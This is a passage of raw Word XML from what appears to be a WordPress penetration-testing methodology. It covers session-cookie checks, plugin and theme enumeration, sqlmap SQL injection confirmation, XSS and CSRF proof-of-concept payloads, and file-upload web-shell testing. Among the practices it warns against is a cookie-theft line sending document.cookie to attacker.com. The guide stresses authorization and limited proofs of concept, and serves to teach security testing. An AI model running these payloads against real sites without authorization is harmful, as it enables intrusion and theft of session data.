      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>hash] cookie: □ HttpOnly: YES/NO □ Secure: YES/NO □ SameSite: None/Lax/Strict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Assessment:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Missing HttpOnly → XSS can steal session (HIGH severity if XSS exists)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Missing Secure → Session hijacking via MitM (MEDIUM on HTTP, INFO on HTTPS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Missing SameSite → CSRF attacks possible (varies by context)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**Session Fixation Testing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Test 1: Check if session ID changes after login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Before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login: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-c pre_login.txt https://target.com/wp-login.php -o /dev/null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pre_session=$(grep wordpress_test pre_login.txt | awk '{print $7}')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After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login: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-X POST https://target.com/wp-login.php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"log=testuser&amp;pwd=testpass"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post_login.txt -L -o /dev/null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post_session=$(grep wordpress_test post_login.txt | awk '{print $7}')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"$pre_session" == "$post_session" ];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"[!] Session Fixation vulnerability - session ID did NOT change after login"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else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"[+] Session ID regenerated after login (secure)"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**Session Timeout Testing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1.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Authenticate and save cookies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-X POST https://target.com/wp-login.php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"log=testuser&amp;pwd=testpass"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session_cookies.txt -L -o /dev/null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2.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Wait various intervals and test if session is still valid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interval in 3600 7200 14400 86400; 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"Testing after $interval seconds..."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sleep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$interval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response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=$(curl -s -b session_cookies.txt https://target.com/wp-admin/ -L)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echo "$response" | grep -q "wp-admin/index.php\|Dashboard";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  [*] Session still valid after $interval seconds"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else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  [+] Session expired after $interval seconds"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break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Document findings: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Session timeout: X seconds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Is it acceptable? (OWASP recommends 15-30 min for sensitive apps)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---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A440EF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  <w:r w:rsidRPr="00A440EF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## 7. PLUGIN &amp; THEME ENUMERATION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A440EF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0"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A440EF">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">### 7.1 Passive Plugin </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A440EF">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Enumeration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**Philosophy: Collect What's Already Public**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Method 1: Extract from HTML source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 |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grep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-oP 'wp-content/plugins/\K[^/"\?]+' |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sort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&gt; evidence/plugins_html_source.txt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Method 2: Extract from CSS files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 |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grep -oP 'wp-content/plugins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/[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^/]+' |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sed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's|wp-content/plugins/||' |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sort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&gt;&gt; evidence/plugins_html_source.txt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Method 3: Extract from JavaScript files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 |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grep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-oP '\.js["\?]' |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grep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"wp-content/plugins" |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grep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-oP 'plugins/\K[^/]+' |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sort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&gt;&gt; evidence/plugins_html_source.txt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Deduplicate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sort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evidence/plugins_html_source.txt -o evidence/plugins_passive.txt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"Passive enumeration found: $(wc -l &lt; evidence/plugins_passive.txt) plugins"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A440EF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0"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A440EF">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">### 7.2 Active Plugin </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A440EF">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Enumeration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**Aggressive Techniques (Use Only with Authorization):**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Method 1: Check common plugin paths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cat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&gt; common_plugins.txt &lt;&lt; 'EOF'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akismet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contact-form-7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wordpress-seo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wordfence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jetpack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woocommerce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elementor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wpforms-lite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all-in-one-seo-pack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google-analytics-for-wordpress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EOF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"Testing for common plugins..."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while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read plugin; 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code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=$(curl -s -o /dev/null -w "%{http_code}"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"https://target.com/wp-content/plugins/$plugin/readme.txt")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"$code" == "200" ];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"[+] Found: $plugin"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# Get version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"https://target.com/wp-content/plugins/$plugin/readme.txt" |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grep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"stable tag" | head -1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&lt; common_plugins.txt | tee evidence/active_plugin_enum.txt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**WPScan Plugin Enumeration (Preferred Tool):**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Passive mode (safe, minimal requests)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wpscan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--url https://target.com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--enumerate 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--plugins-detection passive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no-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update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evidence/wpscan_plugins_passive.json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--format json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Aggressive mode (more requests, better coverage)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wpscan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--url https://target.com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--enumerate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--plugins-detection aggressive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--plugins-version-detection aggressive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no-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update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evidence/wpscan_plugins_aggressive.json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--format json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Mixed mode (balanced)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wpscan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--url https://target.com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--enumerate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--plugins-detection mixed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no-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update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evidence/wpscan_plugins_mixed.txt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A44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A440EF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6"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A440EF">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>### 7.3 Plugin Version Detection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**Manual Version Enumeration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#!/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bin/bash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get_plugin_versions.sh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PLUGINS_FILE="evidence/plugins_passive.txt"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TARGET="https://target.com"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"=== Plugin Version Detection ==="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while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read plugin; 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"Plugin: $plugin"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# Check readme.txt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readme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=$(curl -s "$TARGET/wp-content/plugins/$plugin/readme.txt")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! -z "$readme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 ]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version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=$(echo "$readme" | grep -i "stable tag" | head -1 | grep -oP '[\d.]+')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  Version (readme.txt): $version"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# Check main plugin file (common naming: plugin-name.php or plugin_name.php)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phpfile in "$plugin.php" "$(echo $plugin | tr '-' '_').php"; do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php_content=$(curl -s "$TARGET/wp-content/plugins/$plugin/$phpfile")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! -z "$php_content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 ]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php_version=$(echo "$php_content" | grep -i "Version:" | head -1 | grep -oP '[\d.]+')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! -z "$php_version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 ]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  Version ($phpfile): $php_version"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break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done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&lt; $PLUGINS_FILE | tee evidence/plugin_versions.txt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**Cross-Reference with WordPress Plugin Repository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each discovered plugin, check official repo for latest version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plugin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="contact-form-7"  # Example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Fetch plugin info from wordpress.org API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"https://api.wordpress.org/plugins/info/1.2/?action=plugin_information&amp;slug=$plugin" |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jq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-r '.version' &gt; /tmp/latest_version.txt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detected_version="5.7.1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  #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From your enumeration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latest_version=$(cat /tmp/latest_version.txt)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"Plugin: $plugin"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"Detected version: $detected_version"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"Latest version: $latest_version"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[ "$detected_version" != "$latest_version" ]; then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"[!] OUTDATED - Potential vulnerability"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A440EF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  <w:r w:rsidRPr="00A440EF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### 7.4 Mapping Plugins to CVEs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**WPScan Vulnerability Database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WPScan automatically checks for known vulnerabilities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wpscan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--url https://target.com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--enumerate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vp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--api-token YOUR_WPSCAN_API_TOKEN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no-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update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evidence/wpscan_vulnerabilities.txt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Note: Free API token available at https://wpscan.com/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Limit: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25 requests/day (sufficient for most engagements)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**Manual CVE Lookup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#!/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bin/bash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cve_lookup.sh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plugin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="contact-form-7"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version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="5.7.1"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"Searching for vulnerabilities in $plugin v$version..."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00A440EF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2"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00A440EF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2"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A440EF">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t># Method 1: Search WPScan Vulnerability Database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"https://wpscan.com/api/v3/plugins/$plugin"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-H "Authorization: Token YOUR_API_TOKEN" |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jq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'.vulnerabilities[] | select(.fixed_in &gt; "'$version'" or .fixed_in == null)'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A440EF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2"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A440EF">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t># Method 2: Search CVE databases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NIST NVD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"https://services.nvd.nist.gov/rest/json/cves/2.0?keywordSearch=$plugin" |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jq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'.vulnerabilities[]'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A440EF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2"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A440EF">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t># Method 3: Search Exploit-DB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searchsploit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wordpress $plugin | grep -i "$version"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A440EF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  <w:r w:rsidRPr="00A440EF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**Creating a Vulnerability Matrix</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A440EF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:*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A440EF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After all checks, create a summary table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cat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&gt; evidence/vulnerability_matrix.csv &lt;&lt; 'EOF'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Plugin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,Version,CVE,Severity,Fixed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_In,Exploitable,Notes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contact-form-7,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5.7.1,CVE-2023-XXXXX,HIGH,5.8.0,YES,Unrestricted file upload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akismet,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4.2.0,CVE-2022-YYYYY,MEDIUM,4.2.5,NO,XSS (auth required)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EOF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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A440EF" w:rsidRPr="001B03AE" w:rsidRDefault="00A440EF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your report, present this as a table with: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Plugin name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Installed version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Latest version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Known CVEs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CVSS score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Exploitability assessment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Proof of concept (if applicable)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6E34EF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</w:pPr>
      <w:r w:rsidRPr="006E34EF">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>### 7.5 Common Vulnerable Plugin Classes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6E34EF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color w:val="383A42"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E34EF">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>**File Upload Vulnerabilities</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006E34EF">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>:*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006E34EF">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single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**Indicators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Plugin provides file upload functionality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Common in: gallery plugins, form builders, media managers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**Testing Approach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1.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Identify upload endpoints (requires authentication usually)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2.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Test file type restrictions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# Example test (in Burp Suite):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Upload a PHP file disguised as image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filename="shell.php.jpg"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filename="shell.jpg.php"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filename="shell.php%00.jpg" (null byte injection - rare now)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3.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Check upload directory for execution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https://target.com/wp-content/uploads/2026/01/test.php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If executes instead of downloads, CRITICAL vulnerability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**SQL Injection in Plugins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**Common Vulnerable Parameters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Search functionality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Filter/sorting parameters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ID parameters in custom queries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**Testing Workflow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1.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Identify plugin endpoints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Example: /wp-admin/admin-ajax.php?action=plugin_search&amp;query=test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2.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Test for SQL injection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Manual test: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"https://target.com/wp-admin/admin-ajax.php?action=plugin_search&amp;query=test'" -o /tmp/sqli_test.html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Look for database errors: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grep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"mysql\|syntax\|sql" /tmp/sqli_test.html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3.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Confirm with sqlmap (controlled)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"https://target.com/wp-admin/admin-ajax.php?action=plugin_search&amp;query=test"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--cookie="wordpress_logged_in_xxx=YOUR_COOKIE"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--batch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--level=2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--risk=1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--output-dir=evidence/sqlmap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--threads=2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IMPORTANT: Use --level=2 --risk=1 for initial safe testing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Only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escalate with explicit permission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**XSS in Plugins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**Types to Test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1. **Reflected XSS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 Input immediately reflected in response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2. **Stored XSS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 Input saved and displayed later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3. **DOM-based XSS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 Client-side JavaScript vulnerability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**Testing Payloads (Safe for PoC):**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&lt;!--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Basic test --&gt;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script&gt;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alert('XSS')&lt;/script&gt;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&lt;!--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If &lt; &gt; filtered --&gt;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"&gt;&lt;img src=x onerror=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alert(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'XSS')&gt;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&lt;!--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If quotes filtered --&gt;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script&gt;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alert(String.fromCharCode(88,83,83))&lt;/script&gt;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&lt;!--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Event handler --&gt;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&lt;body onload=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alert(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'XSS')&gt;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**Testing Workflow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Test in plugin forms, search bars, comment fields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Example: Contact form XSS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-X POST https://target.com/wp-admin/admin-ajax.php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"action=submit_form&amp;name=&lt;script&gt;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alert(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'XSS')&lt;/script&gt;&amp;message=test"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-b cookies.txt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evidence/xss_test_response.html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Check if script is reflected without encoding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cat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evidence/xss_test_response.html | grep "&lt;script&gt;alert"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For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stored XSS, check admin panel where data is displayed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**CSRF Vulnerabilities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**Testing Approach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&lt;!--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Create PoC HTML file --&gt;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&lt;!--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csrf_poc.html --&gt;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html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body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&lt;h1&gt;CSRF Proof of Concept&lt;/h1&gt;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&lt;p&gt;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This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form demonstrates CSRF vulnerability in Plugin X&lt;/p&gt;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&lt;form action="https://target.com/wp-admin/admin-post.php" method="POST" id="csrf"&gt;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&lt;input type="hidden" name="action" value="update_plugin_settings" /&gt;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&lt;input type="hidden" name="setting_value" value="malicious_value" /&gt;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&lt;/form&gt;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script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document.getElementById(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'csrf').submit();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&lt;/script&gt;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&lt;/body&gt;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&lt;/html&gt;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**CSRF Testing Checklist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□ Check if nonce/token is present in requests □ Test if nonce is validated server-side □ Test if nonce can be reused □ Test if Referer header is checked □ Test if SameSite cookie attribute is set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**Authentication Bypass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**Common Patterns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Insecure direct object references (IDOR)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Missing capability checks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Logic flaws in authentication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**Example Test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Plugin exposes admin functionality at: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# /wp-admin/admin-ajax.php?action=plugin_admin_function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Test without authentication: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"https://target.com/wp-admin/admin-ajax.php?action=plugin_admin_function&amp;param=value"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evidence/auth_bypass_test.html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Expected: Error or redirect to login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Finding: If functionality executes, it's an authentication bypass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### 7.6 Theme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Enumeration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&amp; Testing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**Active Theme Detection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Extract theme name from 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theme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=$(curl -s https://target.com | grep -oP 'wp-content/themes/\K[^/"\?]+' | head -1)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"Active theme: $theme"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Get theme version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"https://target.com/wp-content/themes/$theme/style.css" | grep -i "version" | head -3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Save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theme stylesheet for analysis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"https://target.com/wp-content/themes/$theme/style.css" &gt; evidence/theme_style.css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**Theme Vulnerability Testing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Check for theme-specific vulnerabilities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wpscan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--url https://target.com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--enumerate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vt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--api-token YOUR_WPSCAN_API_TOKEN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evidence/theme_vulnerabilities.txt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Common theme vulnerabilities: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Insecure file includes (Local File Inclusion)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AJAX handler authentication bypass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XSS in theme options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**Inactive Theme Enumeration (Lower Priority):**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Enumerate all themes (not just active)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wpscan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--url https://target.com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--enumerate at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--plugins-detection mixed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evidence/all_themes.txt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Why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it matters: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Inactive themes can still be exploited if accessible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- Some attacks target wp-admin/theme-editor.php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---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## 8. EXPLOITATION OF COMMON WORDPRESS VULNERABILITIES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### 8.1 SQL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Injection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 Manual Verification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**Scenario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 WPScan identified potential SQL injection in a plugin parameter.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**Step-by-Step Verification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Step 1: Identify the vulnerable parameter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Example from WPScan: Plugin "Example Plugin" v1.2.3 - SQL Injection in 'id' parameter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Step 2: Basic error-based detection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"https://target.com/wp-content/plugins/example-plugin/ajax.php?id=1'"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evidence/sqli_error_test.html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Check for SQL errors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grep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-i "mysql\|sql syntax\|warning\|error" evidence/sqli_error_test.html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Step 3: Boolean-based blind SQL injection test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True condition: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"https://target.com/wp-content/plugins/example-plugin/ajax.php?id=1 AND 1=1"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evidence/sqli_true.html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False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condition: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"https://target.com/wp-content/plugins/example-plugin/ajax.php?id=1 AND 1=2"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evidence/sqli_false.html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Compare file sizes - if different, likely vulnerable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diff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evidence/sqli_true.html evidence/sqli_false.html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**Step 4: Confirm with SQLMap (Controlled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Initial safe scan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"https://target.com/wp-content/plugins/example-plugin/ajax.php?id=1"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--batch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--level=1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--risk=1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--threads=1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--output-dir=evidence/sqlmap_example_plugin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--technique=B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no-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cast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confirmed vulnerable, demonstrate impact (LIMITED):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Get database name only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"https://target.com/wp-content/plugins/example-plugin/ajax.php?id=1"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--batch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--current-db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--output-dir=evidence/sqlmap_example_plugin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Get WordPress table prefix (proves database access)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sqlmap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-u "https://target.com/wp-content/plugins/example-plugin/ajax.php?id=1"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--batch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--tables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wordpress_db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--output-dir=evidence/sqlmap_example_plugin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STOP HERE - Do NOT dump user hashes or sensitive data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**Evidence Collection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□ Screenshot of SQL error message □ SQLMap output showing vulnerability confirmation □ Database name extraction (PoC of data access) □ HTTP request/response showing injection point □ NOTE in report: "Exploitation limited to PoC - user data NOT accessed"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**Severity Rating for SQL Injection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**CRITICAL**: Public-facing, no authentication required, database access confirmed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**HIGH**: Requires authentication, database access confirmed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**MEDIUM**: Requires high-privilege authentication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### 8.2 Cross-Site Scripting (XSS) - Exploitation &amp; PoC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**Stored XSS in Admin Panel (Common in Plugins):**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**Scenario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 Plugin "Contact Form Manager" allows HTML in form submissions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**PoC Steps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Step 1: Submit malicious payload via form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-X POST https://target.com/wp-admin/admin-ajax.php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-H "Content-Type: application/x-www-form-urlencoded"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-b "wordpress_logged_in_xxx=YOUR_COOKIE"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-d "action=save_form_entry&amp;name=&lt;script&gt;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alert(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document.cookie)&lt;/script&gt;&amp;message=test"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evidence/xss_submission.html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Step 2: Access admin panel where data is displayed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https://target.com/wp-admin/admin.php?page=form-entries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-b "wordpress_logged_in_xxx=ADMIN_COOKIE"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evidence/xss_execution.html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Step 3: Verify script is present without encoding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grep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"&lt;script&gt;alert" evidence/xss_execution.html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**IMPORTANT: XSS PoC Guidelines**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 xml:space="preserve">SAFE PoCs (use these): </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>✓</w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">'XSS') </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>✓</w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> alert(document.domain) </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>✓</w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> alert(1) </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>✓</w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> console.log('XSS PoC')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 xml:space="preserve">NEVER use: </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Actual cookie theft (document.location='</w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="001B03AE">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
          </w:rPr>
          <w:t>http://attacker.com?c='+document.cookie</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Account takeover attempts </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Defacement </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Keyloggers </w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> BeEF hooks or actual exploitation frameworks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Even with permission, PoC should demonstrate vulnerability, not cause harm.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**Evidence for XSS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````html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&lt;!--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Screenshot should show: --&gt;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1. Payload submission form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2. Browser alert box with domain/cookie visible (proving execution context)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3. HTML source showing unencoded script tag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4. Impact statement in report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&lt;!--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Example Evidence Screenshot --&gt;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URL: https://target.com/wp-admin/admin.php?page=form-entries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Alert box showing: "XSS" or "target.com"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HTML source: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&lt;td class="form-name"&gt;&lt;script&gt;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alert(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'XSS')&lt;/script&gt;&lt;/td&gt;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**Severity Rating for XSS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**HIGH**: Stored XSS in admin panel (can compromise admin accounts)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**MEDIUM**: Reflected XSS requiring social engineering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**LOW**: Self-XSS or requires significant user interaction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### 8.3 File Upload → Web Shell (Controlled)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**Scenario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 Plugin allows unrestricted file upload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**CRITICAL SAFETY RULES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1. Only upload benign test files initially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2. Test execution BEFORE uploading actual shell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3. If execution is possible, demonstrate with harmless PHP info file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4. DELETE all test files immediately after PoC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5. NEVER upload a functional web shell without explicit authorization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**Safe Testing Workflow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Step 1: Test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file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type restrictions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Upload a harmless text file as .php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echo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"&lt;?php echo 'File upload test'; ?&gt;" &gt; test_upload.php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Upload via plugin's upload mechanism (use Burp Suite for precise control)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Example with curl (if plugin has public upload endpoint):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-X POST https://target.com/wp-content/plugins/vulnerable-plugin/upload.php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-F "file=@test_upload.php"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 xml:space="preserve">  -b "wordpress_logged_in_xxx=YOUR_COOKIE"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-o evidence/upload_response.html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Step 2: Identify upload location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grep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-oP 'uploads/.*?test_upload\.php' evidence/upload_response.html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Step 3: Test if PHP executes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upload_url="https://target.com/wp-content/uploads/2026/01/test_upload.php"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-s $upload_url -o evidence/execution_test.html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If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you see "File upload test" instead of PHP code, execution is possible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cat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evidence/execution_test.html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**If Execution is 